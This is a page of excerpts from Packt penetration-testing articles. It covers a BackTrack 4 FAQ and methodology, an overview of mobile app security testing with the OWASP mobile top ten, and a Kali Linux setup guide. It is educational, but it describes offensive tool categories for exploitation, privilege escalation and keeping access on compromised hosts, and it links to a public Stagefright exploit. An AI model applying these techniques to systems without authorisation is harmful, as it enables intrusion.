used to assess the security of web servers and web applications. Radio network analysis: To audit wireless networks, Bluetooth and radio-frequency identification (RFID) technologies, you can use the tools in this category. Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment. Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level. Maintaining access: Tools in this category will be able to help you in maintaining access to the target machine. Note that, you might need to escalate your privileges before attempting to install any of these tools on the compromised host. Voice over IP (VOIP): In order to analyze the security of VOIP technology you can utilize the tools in this category. BackTrack 4 also contains tools that can be used for: Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring hard disk image, carving files, and analyzing disk archive. Some practical forensic procedures require you to mount the hard drive in question and swap the files in read-only mode to preserve evidence integrity. Reverse engineering: This category contains tools that can be used to debug, decompile and disassemble the executable file.   Q: Do I have to install additional tools with BackTrack 4? A: Although BackTrack 4 comes preloaded with so many security tools, however there are situations where you may need to add additional tools or packages because: It is not included with the default BackTrack 4 installation. You want to have the latest version of a particular tool which is not available in the repository. Our first suggestion is to try search the package in the software repository. If you find the package in the repository, please use that package, but if you can't find it, then you can get the software package from the author's website and install it by yourself. However, the prior method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. However, if you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package by yourself.   Q: Why do we use the WebSecurify tool? A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in the web applications. It can be used to check for the following vulnerabilities: SQL injection Local and remote file include Cross-site scripting Cross-site request forgery Information disclosure Session security flaws WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command: # apt-get install websecurify You can search for tools in the BackTrack repository using the apt-cache search command.   Q: What are the types of penetration testing? A: Black-box testing: The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. Grey-Box testing: The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier.   Q: What is the difference between vulnerability assessment and penetration testing? A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is an expensive service when compared to vulnerability assessment   Q: Which class of vulnerability is considered to be the worst to resolve? A: "Design vulnerability" takes a developer to derive the specifications based on the security requirements and address its implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.   Q: Which OSSTMM test type follows the rules of Penetration Testing? A: Double blind testing   Q: What is an Application Layer? A: Layer-7 of the Open Systems Interconnection (OSI) model is known as the “Application Layer”. The key function of this model is to provide a standardized way of communication across heterogeneous networks. A model is divided into seven logical layers, namely, Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.   Q: What are the steps for BackTrack testing methodology? A: The illustration below shows the BackTrack testing process. Summary In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 8987

article-image-android-and-ios-apps-testing-glance
Packt
02 Feb 2016
21 min read
Save for later

Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and its current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard to classify these vulnerabilities. The readers will also get an opportunity to practice the security testing of these vulnerabilities via the means of readily available vulnerable mobile applications. The article will have a look at the step-by-step setup of the environment that's required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks. (For more resources related to this topic, see here.) Smartphones' market share Understanding smartphones' market share will give us a clear picture about what cyber criminals are after and also what could be potentially targeted. The mobile application developers can propose and publish their applications on the stores and be rewarded by a revenue share of the selling price. The following screenshot that was taken from www.idc.com provides us with the overall smartphone OS market in 2015: Since mobile applications are platform-specific, majority of the software vendors are forced to develop applications for all the available operating systems. Android operating system Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android OS is Linux-based. It can be programmed in C/C++, but most of the application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface). iPhone operating system (iOS) It was developed by Apple Inc. It was originally released in 2007 for iPhone, iPod Touch, and Apple TV. Apple's mobile version of the OS X operating system that's used in Apple computers is iOS. Berkeley Software Distribution (BSD) is UNIX-based and can be programmed in Objective C. Public Android and iOS vulnerabilities Before we proceed with different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as an operating system and covers various fundamental concepts that need to be understood to gain experience in mobile application security. The following table comprises year-wise operating system releases: Year Android iOS 2007/2008 1.0 iPhone OS 1 iPhone OS 2 2009 1.1 iPhone OS 3 1.5 (Cupcake) 2.0 (Eclair) 2.0.1(Eclair) 2010 2.1 (Eclair) iOS 4 2.2 (Froyo) 2.3-2.3.2(Gingerbread) 2011 2.3.4-2.3.7 (Gingerbread) iOS 5 3.0 (HoneyComb) 3.1 (HoneyComb) 3.2 (HoneyComb) 4.0-4.0.2 (Ice Cream Sandwich) 4.0.3-4.0.4 (Ice Cream Sandwich) 2012 4.1 (Jelly Bean) iOS 6 4.2 (Jelly Bean) 2013 4.3 (Jelly bean) iOS 7 4.4 (KitKat) 2014 5.0 (Lollipop) iOS 8 5.1 (Lollipop) 2015   iOS 9 (beta) An interesting research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, has reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf): 97% of the applications that were tested access at least one private information source of these applications 86% of the applications failed to use simple binary-hardening protections against modern-day attacks 75% of the applications do not use proper encryption techniques when storing data on a mobile device 71% of the vulnerabilities resided on the web server 18% of the applications sent usernames and password over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly) So, the key vulnerabilities to mobile applications arise due to a lack of security awareness, "usability versus security trade-off" by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of. Usability versus security trade-off For every developer, it would not be possible to provide users with an application with high security and usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows: Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on a transport layer, or the implemented encryption is insecure. Insecure data storage: Apps may store data either in a cleartext or obfuscated format, or hard-coded keys in the mobile device. An example e-mail exchange server configuration on Android device that uses an e-mail client stores the username and password in cleartext format, which is easy to reverse by any attacker if the device is rooted. Lack of binary protection: Apps do not enforce any anti-reversing, debugging techniques. Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on. Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage. Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and obscurity assumptions of developers. Android vulnerabilities In July 2015, a security company called Zimperium announced that it discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it as a unicorn in the world of Android risk, and it was practically demonstrated in one of the hacking conferences in the US on August 5, 2015. More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db/exploits/38124/. This has made Google release security patches for all Android operating systems, which is believed to be 95% of the Android devices, which is an estimated 950 million users. The vulnerability is exploited through a particular library, which can let attackers take control of an Android device by sending a specifically crafted multimedia services like Multimedia Messaging Service (MMS). If we take a look at the superuser application downloads from the Play Store, there are around 1 million to 5 million downloads. It can be assumed that a major portion of Android smartphones are rooted. The following graphs show the Android vulnerabilities from 2009 until September 2015. There are currently 54 reported vulnerabilities for the Android Google operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). More features that are introduced to the operating system in the form of applications act as additional entry points that allow cyber attackers or security researchers to circumvent and bypass the controls that were put in place. iOS vulnerabilities On June 18, 2015, password stealing vulnerability, also known as Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the security controls mechanism. It clearly provided the need to protect the cross-app mechanism between the operating system and the app developer. Apple rolled a security update week after the XARA research. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/ The following graphs show the vulnerabilities in iOS from 2007 until September 2015. There are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service attacks. This vulnerability makes the application unresponsive. Primarily, the vulnerabilities arise due to insecure libraries or overwriting with plenty of buffer in the stacks. Rooting/jailbreaking Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device. OWASP's top ten mobile risks In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks as per the result of the poll data and mobile application threat landscape: M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own. The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. These are due to malformed inputs, which cause unintended action such as an alteration of database queries, command execution, and so on. In case of mobile applications, malformed inputs can be a serious threat at the local application level and server side as well (refer to M1: Weak server-side controls). Injections at a local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users or file inclusions that may lead to an abuse of functionalities such as SMSes. M8: Security decisions via untrusted inputs: An implementation of certain functionalities such as the use of hidden variables to check authorization status can be bypassed by tampering them during the transit via web service calls or inter-process communication calls. This may lead to privilege escalations and unintended behavior of mobile applications. M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request for services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked. M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application and insert malicious code components and recompile them. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application is tampered or not. In 2015, there was another poll under the OWASP Mobile security group named the "umbrella project". This leads us to have M10 to M2, the trends look at binary protection to take over weak server-side controls. However, we will have wait until the final list for 2015. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf. Vulnerable applications to practice The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to understand the OWASP top ten risks. Some of these applications are as follows: iMAS: iMAS is a collaborative research project initiated by the MITRE corporation (http://www.mitre.org/). This is for application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about. GoatDroid: A simple functional mobile banking application for training with location tracking developed by Jack and Ken for Android application security is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project. iGoat: The OWASP's iGOAT project is similar to the WebGoat web application framework. It's designed to improve the iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/. Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills. This application covers all the OWASP's top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/. MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/. Android application sandboxing Android utilizes the well-established Linux protection ring model to isolate applications from each other. In Linux OS, assigning unique ID segregates every user. This ensures that there is no cross account data access. Similarly in Android OS, every app is assigned with its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application will only be able to access the resources for which it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. For example, the following screenshot provides an illustration of the sandbox mechanism: From the preceding Android Sandbox illustration, we can see how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control. Android Studio and SDK On May 16, 2013 at the Google I/O conference, an Integrated Development Environment (IDE) was released by Katherine Chou under Apache license 2.0; it was called Android Studio and it's used to develop apps on the Android platform. It entered the beta stage in 2014, and the first stable release was on December 2014 from Version 1.0 and it has been announced the official IDE on September 15, 2015. Information on Android Studio and SDK is available at http://developer.android.com/tools/studio/index.html#build-system. Android Studio and SDK heavily depends on the Java SE Development Kit. Java SE Development Kit can be downloaded at http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs such as eclipse. For them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use the Android Studio effectively. The following procedure is used to install the Android Studio on Windows 7 Professional 64-bit Operating System with 4 GB RAM, 500 Gig Hard Disk Space, and Java Development Kit 7 installed: Install the IDE available for Linux, Windows, and Mac OS X. Android Studio can be downloaded by visiting http://developer.android.com/sdk/index.html. Once the Android Studio is downloaded, run the installer file. By default, an installation window will be shown, as shown in the following screenshot. Click on Next: This setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next. It is recommended to read and accept the license and click on Next. It is always recommended to create a new folder to install the tools that will help us track all the evidence in a single place. In this case, we have created a folder called Hackbox in C:, as shown in the following screenshot: Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance. So, it is recommended to allocate a minimum of 2GB for this space. All the necessary files will be extracted to C:Hackbox. Once the installation is complete, you will be able to launch Android Studio, as shown in the following screenshot: Android SDK Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images of the emulators, documentations, and other tools that help create an Android app. We have installed Android Studio with Android SDK. It is crucial to understand how to utilize the in-built SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity. Emulator, simulators, and real devices Sometimes, we tend to believe that all virtual emulations work in exactly the same way in real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices, with different chipsets running different versions of Android. It would be challenge for developers to ensure that all the functionalities for the app reflect in the same way in all devices. It is very crucial to understand the difference between an emulator, simulator, and real devices. Simulators An objective of a simulator is to simulate the state of an object, which is exactly the same state as that of an object. It is preferable that the testing happens when a mobile interacts with some of the natural behavior of the available resources. These are reimplementations of the original software applications that are written, and they are difficult to debug and are mostly writing in high-level languages. Emulators Emulators predominantly aim at replicating the closest possible behavior of mobile devices. These are typically used to test a mobile's behavior internally, such as hardware, software, and firmware updates. These are typically written in machine-level languages and are easy to debug. This is again the reimplementation of the real software. Pros Fast, simple, and little or no price associated Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed It is very easy to find the defects using emulators and fix issues Cons The risk of false positives is increased; some of the functions or protection may actually not work on a real device. Differences in software and hardware will arise. Some of the emulators might be able to mimic the hardware. However, it may or may not work when it is actually installed on that particular hardware in reality. There's a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions. Real devices Real devices are physical devices that a user will be interacting with. There are pros and cons of real devices too. Pros Lesser false positives: Results are accurate Interoperability: All the test cases are on a live environment User experience: Real user experience when it comes to the CPU utilization, memory, and so on for a provided device Performance: Performance issues can be found quickly with real handsets Cons Costs: There are plenty of OEMs, and buying all the devices is not viable. A slowdown in development: It may not be possible to connect an IDE and than emulators. This will significantly slow down the development process. Other issues: The devices that are locally connected to the workstation will have to ensure that USB ports are open, thus opening an additional entry point. Threats A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be defined by the motives; it can be any of the following ones: Intentional: An individual or a group with an aim to break an application and steal information Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information Others: Capabilities, circumstantial, and so on Threat agents A threat agent is used to indicate an individual or a group that can manifest a threat. Threat agents will be able to perform the following actions: Access Misuse Disclose Modify Deny access Vulnerability The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have the PIN or pass code enabled, the phone is vulnerable to data theft. Risk The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can be included along with the probability (P) of the threat occurrences to provide more value to the business. Risk = A x T x V x P These terms will help us understand the real risk to a given asset. Business will be benefited only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities or a vulnerability with no threats is considered to be a low risk. Summary In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike in order to protect end users from attackers who may be attempting to leverage these vulnerabilities.
Read more
  • 0
  • 0
  • 8926
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-what-kali-linux
Packt
05 Feb 2015
1 min read
Save for later

What is Kali Linux

Packt
05 Feb 2015
1 min read
This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 8711

article-image-backtrack-4-penetration-testing-methodologies
Packt
20 Apr 2011
14 min read
Save for later

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices which should be handled with great care in order to assess the system security correctly. Let's take a look at what this methodology looks like. It will help ensure you're using BackTrack effectively and that you're tests are thorough and reliable. Penetration testing can be carried out independently or as a part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, Microsoft SDLC). It is vital to notice that the security of a product not only depends on the factors relating to the IT environment, but also relies on product specific security's best practices. This involves implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment handled by qualified professionals with or without prior knowledge of a system under examination. It can be used to assess all the IT infrastructure components including applications, network devices, operating systems, communication medium, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of a system following their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester to understand and critically analyze the integrity of current defenses during each stage of the testing process. Different types of penetration testing Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are Black-Box and White-Box. These approaches will be discussed in the following sections. Black-box testing The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would have occurred following a successful penetration. An ideal penetration tester would undermine any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context. White-box testing The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. An auditor engaged with white-box testing is also known as white-hat. It does bring more value to the organization as compared to the blackbox approach in the sense that it will eliminate any internal security issues lying at the target infrastructure environment, thus, making it more tightened for malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is a bit more similar to that of black-box, except the use of the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at its early stage before they get disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than the black-box approach. The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing, and the auditor engaged with gray-box testing is also known as grey-hat. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the graybox approach are similar to that of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology. Vulnerability assessment versus penetration testing Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment. This involves commercial grade companies and non-commercial organizations who always misinterpret the term while contracting for the specific type of security assessment. For this obvious reason, we decided to include a brief description on vulnerability assessment and differentiate its core features with penetration testing. Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organizations assets. This technical infrastructure evaluation not only points the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides an assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing process, tools, and techniques are followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerabilities database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management. A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. This perception of an industry, while dealing with both of these assessment types, may confuse and overlap the terms interchangeably, which is absolutely wrong. A qualified consultant always makes an exception to workout the best type of assessment based on the client's business requirement rather than misleading them from one over the other. It is also a duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment. Security testing methodologies There have been various open source methodologies introduced to address security assessment needs. Using these assessment methodologies, one can easily pass the time-critical and challenging task of assessing the system security depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies with your assessment is to execute different types of tests step-by-step in order to judge the security of a system accurately. Therefore, we have introduced four such well-known security assessment methodologies to provide an extended view of assessing the network and application security by highlighting their key features and benefits. These include: Open Source Security Testing Methodology Manual (OSSTMM) Information Systems Security Assessment Framework (ISSAF) Open Web Application Security Project (OWASP) Top Ten Web Application Security Consortium Threat Classification (WASC-TC) All of these testing frameworks and methodologies will assist the security professionals to choose the best strategy that could fit into their client's requirements and qualify the suitable testing prototype. The first two provide general guidelines and methods adhering security testing for almost any information assets. The last two mainly deal with the assessment of an application security domain. It is, however, important to note that the security in itself is an on-going process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before complementing any of the above testing methods, the integrity of the target environment should be assured. Additionally, adapting any single methodology does not necessarily provide a complete picture of the risk assessment process. Hence, it is left up to the security auditor to select the best strategy that can address the target testing criteria and remains consistent with its network or application environment. There are many security testing methodologies which claim to be perfect in finding all security issues, but choosing the best one still requires a careful selection process under which one can determine the accountability, cost, and effectiveness of the assessment at optimum level. Thus, determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and serving unwanted resources to a security testing process can put the whole business economy in danger. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a recognized international standard for security testing and analysis and is being used by many organizations in their day-to-day assessment cycle. It is purely based on scientific method which assists in quantifying the operational security and its cost requirements in concern with the business objectives. From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type 